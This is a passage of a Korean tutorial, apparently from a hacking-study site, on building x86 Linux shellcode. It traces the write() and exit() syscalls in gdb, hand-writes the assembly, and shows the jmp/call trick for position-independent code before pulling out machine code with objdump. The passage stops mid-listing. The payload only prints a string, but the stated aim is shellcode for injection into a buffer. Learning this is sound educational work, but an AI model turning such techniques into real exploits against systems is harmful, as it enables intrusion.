\ub2e4\ub978 \ubc29\ubc95\uc73c\ub85c <br \/>C\uc5b8\uc5b4\ub85c \ud504\ub85c\uadf8\ub7a8\uc744 \ub9cc\ub4e0\ub4a4 gdb\uc5d0\uc11c disassemble\uc744 \ud1b5\ud558\uc5ec \uc54c\uc218 \uc788\ub2e4.&nbsp; <br \/><br \/>\uc774\uc81c system call\uc774\ub77c\ub294 \uac83\uc744 \uc774\ud574\ud558\uae30 \uc704\ud558\uc5ec \ub2e4\ub978 \uc608\uc81c\ub97c \ub9cc\ub4e4\uc5b4 \ubcf4\uc790. \uc544\ub798\ub294&nbsp; \"I'm Willy in&nbsp; <br \/>Null@Root\"\ub97c \ucd9c\ub825\ud558\ub294 \uac04\ub2e8\ud55c C\uc5b8\uc5b4 \ud504\ub85c\uadf8\ub7a8\uc774\ub2e4.&nbsp; <br \/><br \/>[willy@Null@Root]$ cat test21.c <br \/>main() <br \/>{ <br \/>&nbsp;&nbsp; write(1,\"I'm Willy in Null@Root\\n\",23); <br \/>} <br \/><br \/>[willy@Null@Root]$ gcc test21.c -o test21 -mpreferred-stack-boundary=2 -static <br \/>\uc5ec\uae30\uc11c -static \uc635\uc158\uc744 \uc4f4 \uc774\uc720\ub294 \uc778\ud130\ub7fd\ud2b8 \ubd80\ubd84\uc744 \ubcf4\uae30 \uc704\ud574\uc11c\uc774\ub2e4. <br \/><br \/>[willy@Null@Root]$ .\/test21 <br \/>I'm Willy in Null@Root <br \/><br \/>[willy@Null@Root]$ gdb -q test21 <br \/>(gdb) disassemble main <br \/>Dump of assembler code for function main: <br \/>0x80481dc &lt;main&gt;: &nbsp; &nbsp; &nbsp; push &nbsp; %ebp <br \/>0x80481dd &lt;main+1&gt;: &nbsp; &nbsp; mov &nbsp;&nbsp; %esp,%ebp <br \/>0x80481df &lt;main+3&gt;: &nbsp; &nbsp; push &nbsp; $0x17 <br \/>0x80481e1 &lt;main+5&gt;: &nbsp; &nbsp; push &nbsp; $0x808b1c8 <br \/>0x80481e6 &lt;main+10&gt;: &nbsp;&nbsp; push &nbsp; $0x1 <br \/>0x80481e8 &lt;main+12&gt;: &nbsp;&nbsp; call &nbsp; 0x804c390 &lt;__libc_write&gt; <br \/>0x80481ed &lt;main+17&gt;: &nbsp;&nbsp; add &nbsp;&nbsp; $0xc,%esp <br \/>0x80481f0 &lt;main+20&gt;: &nbsp;&nbsp; leave &nbsp; <br \/>0x80481f1 &lt;main+21&gt;: &nbsp;&nbsp; ret &nbsp; &nbsp; <br \/>0x80481f2 &lt;main+22&gt;: &nbsp;&nbsp; nop &nbsp; &nbsp; <br \/>0x80481f3 &lt;main+23&gt;: &nbsp;&nbsp; nop &nbsp; &nbsp; <br \/>End of assembler dump. 
<br \/>(gdb) disassemble __libc_write <br \/>Dump of assembler code for function __libc_write: <br \/>0x804c390 &lt;__libc_write&gt;: &nbsp; &nbsp; &nbsp; push &nbsp; %ebx <br \/>0x804c391 &lt;__libc_write+1&gt;: &nbsp; &nbsp; mov &nbsp;&nbsp; 0x10(%esp,1),%edx <br \/>0x804c395 &lt;__libc_write+5&gt;: &nbsp; &nbsp; mov &nbsp;&nbsp; 0xc(%esp,1),%ecx <br \/>0x804c399 &lt;__libc_write+9&gt;: &nbsp; &nbsp; mov &nbsp;&nbsp; 0x8(%esp,1),%ebx <br \/>0x804c39d &lt;__libc_write+13&gt;: &nbsp;&nbsp; mov &nbsp;&nbsp; $0x4,%eax <br \/>0x804c3a2 &lt;__libc_write+18&gt;: &nbsp;&nbsp; int &nbsp;&nbsp; $0x80 <br \/>0x804c3a4 &lt;__libc_write+20&gt;: &nbsp;&nbsp; pop &nbsp;&nbsp; %ebx <br \/>0x804c3a5 &lt;__libc_write+21&gt;: &nbsp;&nbsp; cmp &nbsp;&nbsp; $0xfffff001,%eax <br \/>0x804c3aa &lt;__libc_write+26&gt;: &nbsp;&nbsp; jae &nbsp;&nbsp; 0x804cab0 &lt;__syscall_error&gt; <br \/>0x804c3b0 &lt;__libc_write+32&gt;: &nbsp;&nbsp; ret &nbsp; &nbsp; <br \/>End of assembler dump. <br \/><br \/>disassemble main\uc744 \ubcf4\uba74 ebp\ub97c \uc124\uc815\ud558\uace0, 0x17(string\ud06c\uae30), string address, 1(std_out)\uc744 stack <br \/>\uc73c\ub85c \ub123\uc740 \ub4a4 call\uc744 \ud558\ub294 \uac83\uc744 \ubcfc\uc218 \uc788\ub2e4. \uc774\ub294 \uc704\uc5d0\uc11c \uc124\uba85\ud588\ub358 \uac83\ucc98\ub7fc \ud568\uc218\ub97c call\ud558\uae30 \uc804\uc5d0 <br \/>\uc778\uc218\ub4e4\uc744 \ub9e8 \ub4b7\uac70 \ubd80\ud130 stack\uc5d0 \ub123\ub294 \uac83\uc744 \uc54c\uc218 \uc788\ub2e4. disassemble __libc_write\ub97c \ubcf4\uba74 \uc21c\uc11c\uac00&nbsp; <br \/>\ub2e4\ub974\ub354\ub77c\ub3c4 eax, ebx, ecx, edx\uc5d0 data\uac00 \ub4e4\uc5b4\uac04\ub4a4 int $0x80\uc73c\ub85c system call\uc744 \ud558\ub294\uac83\uc744 \uc54c\uc218&nbsp; <br \/>\uc788\ub2e4. \uadf8\ub7fc eax, ebx, ecx, edx\uc5d0 \uc5b4\ub5a4 \uac12\uc774 \ucc44\uc6cc\uc9c0\ub294\uc9c0 \ubcf4\uae30\ub85c \ud558\uc790.. 
&nbsp; <br \/><br \/>0x804c391 &lt;__libc_write+1&gt;: &nbsp; &nbsp; mov &nbsp;&nbsp; 0x10(%esp,1),%edx&nbsp; \uc774 \uc704\uce58\uc5d0\uc11c stack\uc5d0 \uc313\uc5ec\uc788\ub294 data\ub97c <br \/>\ubcf4\uba74. <br \/><br \/>&nbsp; &nbsp; &nbsp; &nbsp; +----------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; %ebx &nbsp; | &nbsp; &lt;--- %esp \uac12 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; (\ub0ae\uc740 \uc8fc\uc18c) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +----------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; ret &nbsp;&nbsp; | &nbsp;&nbsp; %esp + 0x04 <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +----------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; 0x1 &nbsp;&nbsp; | &nbsp;&nbsp; %esp + 0x08 &nbsp;&nbsp; ---&gt; %ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +----------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; |string\uc8fc\uc18c| &nbsp;&nbsp; %esp + 0x0c &nbsp;&nbsp; ---&gt; %ecx &nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +----------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | 0x17(23) | &nbsp;&nbsp; %esp + 0x10 &nbsp;&nbsp; ---&gt; %edx &nbsp; &nbsp; &nbsp; (\ub192\uc740 \uc8fc\uc18c) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +----------+ <br \/><br \/>eax,ebx,ecx,edx\uc5d0\ub294 \uc544\ub798\uc640 \uac19\uc740 data\uac00 \ub4e4\uc5b4\uac04\ub4a4 \uc778\ud130\ub7fd\ud2b8(int $0x80)\uac00 \ub418\ub294 \uac83\uc744 \uc54c\uc218\uc788\ub2e4. 
<br \/>&nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +----------+----------+--------------------------------------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; %eax &nbsp; | &nbsp; 0x04 &nbsp; |&nbsp; write()\ub97c \uc758\ubbf8\ud558\ub294 system call no.&nbsp; |&nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +----------+----------+--------------------------------------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; %ebx &nbsp; | &nbsp; 0x01 &nbsp; |&nbsp; STANDARD_OUT\uc758 \uc758\ubbf8 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; | <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +----------+----------+--------------------------------------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; %ecx &nbsp; | str addr |&nbsp; string\uc758 \uc8fc\uc18c &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; | <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +----------+----------+--------------------------------------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; %edx &nbsp; | &nbsp; 0x17 &nbsp; |&nbsp; string\uc758 size &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +----------+----------+--------------------------------------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; &nbsp;&nbsp; int $0x80 &nbsp; &nbsp;&nbsp; |&nbsp; system call \ud638\ucd9c &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +---------------------+--------------------------------------+ <br \/><br \/>\uc774\uc81c \uc774 \uacb0\uacfc\ub97c \uc774\uc6a9\ud558\uc5ec \uac04\ub2e8\ud558\uac8c \uc704\uc758 \uae00\uc790\ub97c \ucd9c\ub825\ud558\ub294 \ud504\ub85c\uadf8\ub7a8\uc744 \uc5b4\uc148\ube14\ub9ac\ub85c \uc791\uc131\ud574 \ubcf4\uc790. 
<br \/><br \/>[willy@Null@Root]$ cat test22.s <br \/>.LC0: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .string \"I'm Willy in Null@Root\\n\"&nbsp; <br \/>.globl main <br \/>main: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x04, %eax <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x01, %ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $.LC0, %ecx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x17, %edx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; int &nbsp; &nbsp; $0x80 <br \/>&nbsp; &nbsp; &nbsp; &nbsp; ret <br \/><br \/>[willy@Null@Root]$ gcc test22.s -o test22 <br \/><br \/>[willy@Null@Root]$ .\/test22 <br \/>I'm Willy in Null@Root <br \/>\uc138\uadf8\uba58\ud14c\uc774\uc158 \uc624\ub958 (core dumped) <br \/><br \/>\uc77c\ub2e8 write()\ud568\uc218\ub97c system call\ud558\uc5ec \ubb38\uc790\ub97c \ucd9c\ub825\ud558\ub294\ub370\ub294 \uc131\uacf5\ud588\ub2e4.. \uadf8\ub7f0\ub370 \uadf8\ub4a4\uc5d0 \uc138\uadf8\uba58\ud14c\uc774\uc158 <br \/>\uc624\ub958\uac00 \ubc1c\uc0dd\ud558\ub294 \ubb38\uc81c\uac00 \uc788\uc74c\uc744 \ubcfc\uc218 \uc788\uc73c\uba70, \uc774\ub294 \ud504\ub85c\uadf8\ub7a8\uc758 \uc885\ub8cc\uc2dc\uc5d0 \ud504\ub85c\uadf8\ub7a8\uc758 \uc790\uc6d0\uc744 \ub9b4\ub9ac\uc988 <br \/>\ud558\ub294 \ubcc4\ub3c4\uc758 \ub8e8\ud2f4\uc774 \uc124\uc815\ub418\uc9c0 \uc54a\uc558\uae30 \ub54c\ubb38\uc774\ub2e4. \ub530\ub77c\uc11c \uc774\ub97c \ud574\uacb0\ud558\uae30 \uc704\ud574 exit() \uc2dc\uc2a4\ud15c\ucf5c\uc744 \ud638\ucd9c <br \/>\ud574 \uc918\uc57c\ud55c\ub2e4. \uadf8 \uc758\ubbf8\ub294 1\ucc28\uc801\uc73c\ub85c \uc778\ud130\ub7fd\ud2b8\ub97c \uc218\ud589\ud558\uc5ec write()\ub97c call\ud558\uace0 \ud504\ub85c\uadf8\ub7a8 \uc885\ub8cc\uc804 \ub610&nbsp; <br \/>\ud55c\ubc88\uc5d0 \uc778\ud130\ub7fd\ud2b8\ub85c exit()\uc744 \uc218\ud589\ud558\uc5ec \uc815\uc0c1\uc801\uc778 \uc885\ub8cc\uac00 \ub418\ub3c4\ub85d \ud558\ub294 \uac83\uc774\ub2e4. 
\uc774\uac83\uc740 \ud55c \ud504\ub85c\uadf8\ub7a8\uc5d0\uc11c \uba87\uac1c <br \/>\uc758 system call\uc744 \ud560\uc218 \uc788\uc74c\uc744 \uc758\ubbf8\ud558\uae30\ub3c4 \ud55c\ub2e4. \uadf8\ub7fc exit() system call\uc2dc \ud544\uc694\ud55c \uc778\uc218\ub4e4\uc744 \uc54c\uc544 <br \/>\ubcf4\uae30 \uc704\ud558\uc5ec \uc544\ub798\uc640 \uac19\uc774 \uac04\ub2e8\ud55c C\uc5b8\uc5b4 \ud504\ub85c\uadf8\ub7a8\uc744 \uc791\uc131\ud55c\ub4a4 gdb\ub85c \ub0b4\uc6a9\uc744 \uc0b4\ud3b4\ubcf4\uc790. <br \/><br \/>[willy@Null@Root]$ cat test3.c <br \/>main() <br \/>{ <br \/>exit(0); <br \/>} <br \/><br \/>[willy@Null@Root]$ gcc test3.c -o test3 -mpreferred-stack-boundary=2 -static <br \/><br \/>[willy@Null@Root]$ gdb -q test3 <br \/>(gdb) disassemble main <br \/>Dump of assembler code for function main: <br \/>0x80481dc &lt;main&gt;: &nbsp; &nbsp; &nbsp; push &nbsp; %ebp <br \/>0x80481dd &lt;main+1&gt;: &nbsp; &nbsp; mov &nbsp;&nbsp; %esp,%ebp <br \/>0x80481df &lt;main+3&gt;: &nbsp; &nbsp; push &nbsp; $0x0 <br \/>0x80481e1 &lt;main+5&gt;: &nbsp; &nbsp; call &nbsp; 0x80483a4 &lt;exit&gt; <br \/>0x80481e6 &lt;main+10&gt;: &nbsp;&nbsp; nop &nbsp; &nbsp; <br \/>0x80481e7 &lt;main+11&gt;: &nbsp;&nbsp; nop &nbsp; &nbsp; <br \/>End of assembler dump. <br \/>(gdb) disassemble _exit <br \/>Dump of assembler code for function _exit: <br \/>0x804c330 &lt;_exit&gt;: &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; %ebx,%edx <br \/>0x804c332 &lt;_exit+2&gt;: &nbsp;&nbsp; mov &nbsp;&nbsp; 0x4(%esp,1),%ebx <br \/>0x804c336 &lt;_exit+6&gt;: &nbsp;&nbsp; mov &nbsp;&nbsp; $0x1,%eax <br \/>0x804c33b &lt;_exit+11&gt;: &nbsp; int &nbsp;&nbsp; $0x80 <br \/>0x804c33d &lt;_exit+13&gt;: &nbsp; mov &nbsp;&nbsp; %edx,%ebx <br \/>0x804c33f &lt;_exit+15&gt;: &nbsp; cmp &nbsp;&nbsp; $0xfffff001,%eax <br \/>0x804c344 &lt;_exit+20&gt;: &nbsp; jae &nbsp;&nbsp; 0x804ca70 &lt;__syscall_error&gt; <br \/>End of assembler dump. 
<br \/>(gdb)&nbsp; <br \/><br \/>_exit\ub85c \ubd80\ud130 %eax = 1, %ebx = 0 \uc124\uc815\ud6c4 int $0x80\uc744 \ud558\uba74 exit(0) \uacb0\uacfc\ub97c \uc5bb\uc744\uc218 \uc788\ub2e4.&nbsp; <br \/><br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; movl &nbsp;&nbsp; $0x01, %eax <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; movl &nbsp;&nbsp; $0x00, %ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; int &nbsp; &nbsp; $0x80 <br \/><br \/>\uc774\ubd80\ubd84\uc744 \ucd94\uac00 \ud558\uba74 exit(0)\uc774 system call\ub418\ub294 \uac83\uc744 \uc54c\uc218 \uc788\ub2e4. \uadf8\ub7fc \uc774\uac83\uc744 test22.s\uc5d0 \ucd94\uac00\ud558\uc5ec <br \/>\uc2e4\ud589\ud574 \ubcf4\uc790. <br \/><br \/>[willy@Null@Root]$ cat test23.s <br \/>.LC0: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .string \"I'm Willy in Null@Root\\n\"&nbsp; <br \/>.globl main <br \/>main: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x04, %eax <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x01, %ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $.LC0, %ecx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x17, %edx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; int &nbsp; &nbsp; $0x80 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;---&nbsp; write()\ub97c \uc704\ud55c \uc778\ud130\ub7fd\ud2b8 <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x01, %eax <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x00, %ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; int &nbsp; &nbsp; $0x80 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;---&nbsp; exit(0)\uc744 \uc704\ud55c \uc778\ud130\ub7fd\ud2b8&nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; ret <br \/><br \/>[willy@Null@Root]$ cc test23.s -o test23 <br \/><br \/>[willy@Null@Root]$ .\/test23 <br \/>I'm Willy in Null@Root <br \/><br \/>\uc774\uc81c \uc885\ub8cc\ubb38\uc81c\ub97c \ud574\uacb0\ud558\uc600\ub2e4. 
\ub9cc\uc57d \uc774\uac83\uc744 Shellcode\ucc98\ub7fc \uae30\uacc4\uc5b4\ucf54\ub4dc\ub85c \ubc14\uafb8\uc5b4 Buffer\uc5d0 \ub123\uc5b4 \uc2e4\ud589 <br \/>\uc2dc\ud0a4\ub824\uace0 \ud558\uba74 \uc5b4\ub5a4 \ubb38\uc81c\uac00 \uc788\uc744\uae4c?&nbsp; \ubc14\ub85c string\uc758 \uc8fc\uc18c\uac00 \ubb38\uc81c\uc774\ub2e4. \uc5ec\uae30\uc11c\ub294 string\uc774 \uc808\ub300\uc8fc\uc18c <br \/>\ub85c \uc124\uc815\ud558\uc600\ub294\ub370 \uc774 \uc808\ub300\uc8fc\uc18c\ub294 \uc784\uc758\uc758 Buffer\uc5d0 \ub123\uc5b4\uc9c0\uba74 \uc544\ubb34\ub7f0 \uad00\uacc4\uac00 \uc5c6\uc5b4 string\uc744 \ucc3e\uc744\uc218&nbsp; <br \/>\uc5c6\ub2e4. \uadf8\ub7ec\ubbc0\ub85c&nbsp; \uae30\uacc4\uc5b4\ucf54\ub4dc \ub0b4\uc5d0\uc11c \uc8fc\uc18c\ub97c \ucc3e\uc744\uc218 \uc788\ub3c4\ub85d \uc0c1\ub300\uc8fc\uc18c\ub85c \ub9cc\ub4e4\uc5b4 \uc8fc\uc5b4\uc57c \ud55c\ub2e4. \uadf8\ub7ec\uba74 <br \/>\uc0c1\ub300\uc8fc\uc18c\uac00 \ub418\ub3c4\ub85d \ud558\ub824\uba74? \uc544\ub798 test24.s\uc640 \uac19\uc774 jmp \uc640 call\ub97c \uc0ac\uc6a9\ud558\uc5ec \uc815\uc758\ud574 \uc8fc\uba74 \ub41c\ub2e4. 
<br \/><br \/>[willy@Null@Root]$ cat test24.s <br \/>.globl main <br \/>main: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; jmp &nbsp; &nbsp; strings <br \/>start:&nbsp; popl &nbsp;&nbsp; %esi <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x04, %eax <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x01, %ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; %esi, %ecx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x17, %edx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; int &nbsp; &nbsp; $0x80 <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x01, %eax <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $0x00, %ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; int &nbsp; &nbsp; $0x80 <br \/>strings:call &nbsp;&nbsp; start <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .string \"I'm Willy in Null@Root\\n\"&nbsp; <br \/><br \/>\uc704\uc758 test23.s\uc640 \uc5b4\ub5bb\uac8c \ubc14\ub00c\uc5c8\ub294\uc9c0 \ubcf4\uc790.&nbsp; \uc704\ucabd\uc5d0 jmp strings\uc640 start: popl %esi\uac00 \ucd94\uac00\ub418\uc5c8\uace0 <br \/>\uc911\uac04\uc5d0 \ubcf4\uba74 $.LC0\uac00 %esi\ub85c, \uc544\ub798\ucabd\uc5d0 strings: call start\uac00 \ucd94\uac00 \ub418\uc5c8\uc73c\uba70, \ubb38\uc790\uc5f4\uc774 \uc544\ub798\ub85c&nbsp; <br \/>\ub0b4\ub824\uc654\ub2e4.&nbsp; \uc774 \ud504\ub85c\uadf8\ub7a8\uc758 \uc218\ud589 \uc21c\uc11c\ub97c \ub530\ub77c\uc11c \ub0b4\uc6a9\ub97c \uc0b4\ud3b4\ubcf4\uc790. <br \/><br \/>&nbsp; &nbsp; &nbsp; step 1: \ucc98\uc74c jmp\ub97c \ub9cc\ub098\uc11c strings:\ub85c \uc774\ub3d9&nbsp; <br \/>&nbsp; &nbsp; &nbsp; step 2: strings:\uc5d0 call\uc740 \ub2e4\uc74c\uc704\uce58\uc778 \ubb38\uc790\uc5f4 \uc8fc\uc18c\ub97c stack\uc5d0 \uc800\uc7a5\ud55c\ub4a4 start\ub85c \uc774\ub3d9 <br \/>&nbsp; &nbsp; &nbsp; step 3: start:\uc5d0 popl %esi\uc740 \ub9c8\uc9c0\ub9c9\uc5d0 stack\uc5d0 \uc800\uc7a5\ud55c \ubb38\uc790\uc5f4 \uc8fc\uc18c\ub97c %esi\uc5d0 \ub123\ub294\ub2e4. <br \/>&nbsp; &nbsp; &nbsp; step 4: movl\ub97c \ud1b5\ud574\uc11c %eax,%ebx,%ecx,%edx\uc744 \ucc44\uc6b4\ub2e4. 
\uc774\ub54c %ecx\uc5d0 %esi(\ubb38\uc790\uc5f4\uc8fc\uc18c)\uac00 <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \ub4e4\uc5b4\uac04\ub2e4. <br \/>&nbsp; &nbsp; &nbsp; step 5: int $0x80\uc73c\ub85c write() \ud568\uc218 \uc2e4\ud589\uc744 \uc704\ud55c system call\uc744 \ud55c\ub2e4. <br \/>&nbsp; &nbsp; &nbsp; step 6: movl\ub85c %eax, %ebx\ub97c \ucc44\uc6b4\ub2e4. <br \/>&nbsp; &nbsp; &nbsp; step 7: int $0x80\uc73c\ub85c exit(0)\ud568\uc218\ub97c system call\ud55c\ub2e4. (\uc815\uc0c1\uc885\ub8cc) <br \/><br \/>[willy@Null@Root]$ gcc test24.s -o test24 <br \/>[willy@Null@Root]$ .\/test24 <br \/>I'm Willy in Null@Root <br \/><br \/>\uc815\uc0c1\uc801\uc73c\ub85c \uc2e4\ud589\ub418\ub294 \uac83\uc744 \ud655\uc778\ud558\uc600\ub2e4. \uc774\uc81c\ub294 objdump\ub97c \uc774\uc6a9\ud558\uc5ec \uae30\uacc4\uc5b4\ucf54\ub4dc\ub97c \ub9cc\ub4e4\uc5b4 \ubcf4\uc790. <br \/><br \/>[willy@Null@Root]$ objdump -d test24 <br \/><br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; : <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; : &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br \/>0804841c &lt;main&gt;: <br \/>804841c: &nbsp; &nbsp; &nbsp; eb 20 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jmp &nbsp;&nbsp; 804843e &lt;strings&gt; <br \/><br \/>0804841e &lt;start&gt;: <br \/>804841e: &nbsp; &nbsp; &nbsp; 5e &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; pop &nbsp;&nbsp; %esi <br \/>804841f: &nbsp; &nbsp; &nbsp; b8 04 00 00 00 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; $0x4,%eax <br \/>8048424: &nbsp; &nbsp; &nbsp; bb 01 00 00 00 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; $0x1,%ebx <br \/>8048429: &nbsp; &nbsp; &nbsp; 89 f1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mov &nbsp;&nbsp; %esi,%ecx <br \/>804842b: &nbsp; &nbsp; &nbsp; ba 17 00 00 00 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; $0x17,%edx <br \/>8048430: &nbsp; &nbsp; &nbsp; cd 80 &nbsp; &nbsp; 
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; int &nbsp;&nbsp; $0x80 <br \/>8048432: &nbsp; &nbsp; &nbsp; b8 01 00 00 00 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; $0x1,%eax <br \/>8048437: &nbsp; &nbsp; &nbsp; bb 00 00 00 00 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; $0x0,%ebx <br \/>804843c: &nbsp; &nbsp; &nbsp; cd 80 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; int &nbsp;&nbsp; $0x80 <br \/><br \/>0804843e &lt;strings&gt;: <br \/>804843e: &nbsp; &nbsp; &nbsp; e8 db ff ff ff &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; call &nbsp; 804841e &lt;start&gt; <br \/>8048443: &nbsp; &nbsp; &nbsp; 49 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; dec &nbsp;&nbsp; %ecx <br \/>8048444: &nbsp; &nbsp; &nbsp; 27 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; daa &nbsp; &nbsp; <br \/>8048445: &nbsp; &nbsp; &nbsp; 6d &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; insl &nbsp; (%dx),%es:(%edi) <br \/>8048446: &nbsp; &nbsp; &nbsp; 20 57 69 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; and &nbsp;&nbsp; %dl,0x69(%edi) <br \/>8048449: &nbsp; &nbsp; &nbsp; 6c &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; insb &nbsp; (%dx),%es:(%edi) <br \/>804844a: &nbsp; &nbsp; &nbsp; 6c &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; insb &nbsp; (%dx),%es:(%edi) <br \/>804844b: &nbsp; &nbsp; &nbsp; 79 20 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jns &nbsp;&nbsp; 804846d &lt;__do_global_ctors_aux+0xd&gt; <br \/>804844d: &nbsp; &nbsp; &nbsp; 69 6e 20 4e 75 6c 6c &nbsp;&nbsp; imul &nbsp; $0x6c6c754e,0x20(%esi),%ebp <br \/>8048454: &nbsp; &nbsp; &nbsp; 40 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; inc &nbsp;&nbsp; %eax <br \/>8048455: &nbsp; &nbsp; &nbsp; 52 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; push &nbsp; %edx <br \/>8048456: &nbsp; 
